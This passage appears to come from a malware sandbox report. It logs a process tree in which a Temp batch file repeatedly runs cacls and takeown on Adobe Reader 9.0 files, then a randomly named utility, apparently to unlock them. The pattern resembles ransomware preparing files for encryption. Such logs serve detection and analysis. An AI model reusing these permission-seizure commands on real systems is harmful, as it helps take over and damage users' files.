- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"
    3⤵
    PID:324
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "MyriadPro-Regular.otf" -nobanner
    3⤵
    PID:592
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "MyriadPro-Regular.otf" -nobanner
      4⤵
      PID:1824
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
    3⤵
    PID:224
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    PID:1628
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
      4⤵
      PID:1844
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1816
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""
  2⤵
  PID:1640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"
    3⤵
    - Modifies file permissions
    PID:1736
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "can03.ths" -nobanner
    3⤵
    PID:1056
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "can03.ths" -nobanner
      4⤵
      PID:1240
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  PID:304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
    3⤵
    PID:324
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
      4⤵
      PID:1004
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:592
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  PID:1060
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
    3⤵
    - Modifies file permissions
    PID:224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ROMAN.TXT" -nobanner
    3⤵
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      PID:1032
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""
  2⤵
  PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"
    3⤵
    PID:1508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CP1257.TXT" -nobanner
    3⤵
    PID:1736
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CP1257.TXT" -nobanner
      4⤵
      PID:1384
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1056
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""
  2⤵
  PID:472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "forms_distributed.gif" -nobanner
    3⤵
    PID:1268
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "forms_distributed.gif" -nobanner
      4⤵
      PID:1496
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif""
  2⤵
  PID:208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif" /E /G Admin:F /C
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif"
    3⤵
    - Modifies file permissions
    PID:1888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "reviews_sent.gif" -nobanner
    3⤵
    PID:820
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "reviews_sent.gif" -nobanner
      4⤵
      PID:1332
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif""
  2⤵
  PID:1232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif" /E /G Admin:F /C
    3⤵
    PID:212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif"
    3⤵
    - Modifies file permissions
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "stop_collection_data.gif" -nobanner
    3⤵
    PID:1796
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "stop_collection_data.gif" -nobanner
      4⤵
      PID:1432
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""
  2⤵
  PID:788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"
    3⤵
    PID:1004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ReadMe.htm" -nobanner
    3⤵
    PID:1316
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ReadMe.htm" -nobanner
      4⤵
      PID:1824
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""
  2⤵
  PID:112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"
    3⤵
    - Modifies file permissions
    PID:1032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "MinionPro-It.otf" -nobanner
    3⤵
    PID:1060
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "MinionPro-It.otf" -nobanner
      4⤵
      PID:1516
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1936
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB""
  2⤵
  PID:1568
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB" /E /G Admin:F /C
    3⤵
    PID:320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB"
    3⤵
    PID:1000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ZX______.PFB" -nobanner
    3⤵
    PID:1232
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ZX______.PFB" -nobanner
      4⤵
      PID:1816
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1176
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp""
  2⤵
  PID:364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp" /E /G Admin:F /C
    3⤵
    PID:1316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp"
    3⤵
    - Modifies file permissions
    PID:304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "brt04.hsp" -nobanner
    3⤵
    PID:1572
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "brt04.hsp" -nobanner
      4⤵
      PID:788
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""
  2⤵
  PID:236
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env" /E /G Admin:F /C
    3⤵
    PID:944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env"
    3⤵
    - Modifies file permissions
    PID:1508
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "engphon.env" -nobanner
    3⤵
    PID:112
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "engphon.env" -nobanner
      4⤵
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""
  2⤵
  PID:2024
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CORPCHAR.TXT" -nobanner
    3⤵
    PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CORPCHAR.TXT" -nobanner
      4⤵
      PID:1480
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:932
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C
    3⤵
    PID:1032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"
    3⤵
    - Modifies file permissions
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CP1250.TXT" -nobanner
    3⤵
    PID:592
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CP1250.TXT" -nobanner
      4⤵
      PID:384
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1936
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  PID:1056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    - Modifies file permissions
    PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    PID:236
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      PID:1816
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1384
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  PID:1932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:2032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    PID:932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    PID:2024
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      PID:1844
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  PID:944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    - Modifies file permissions
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    PID:232
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      PID:1840
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:1708
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:1432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    - Modifies file permissions
    PID:1060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      PID:1384
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1360
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  PID:752
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    PID:1752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:1496
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1416
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:1472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    PID:1888
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      PID:2040
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  PID:944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:1816
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    PID:236
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    PID:1056
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    PID:364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "brt32.clx" -nobanner
    3⤵
    PID:1528
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "brt32.clx" -nobanner
      4⤵
      PID:472
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1916
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  PID:1572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:1476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    - Modifies file permissions
    PID:1936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "usa.fca" -nobanner
    3⤵
    PID:788
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "usa.fca" -nobanner
      4⤵
      PID:2040
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1796
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\SwlhOybc.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  PID:684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1736
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    PID:1060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3w3GwRsK.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
      3w3GwRsK.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      PID:1384
- - C:\Users\Admin\AppData\Local\Temp\3w3GwRsK.exe
    3w3GwRsK.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1360
- C:\Windows\SysWOW64\cmd.exe
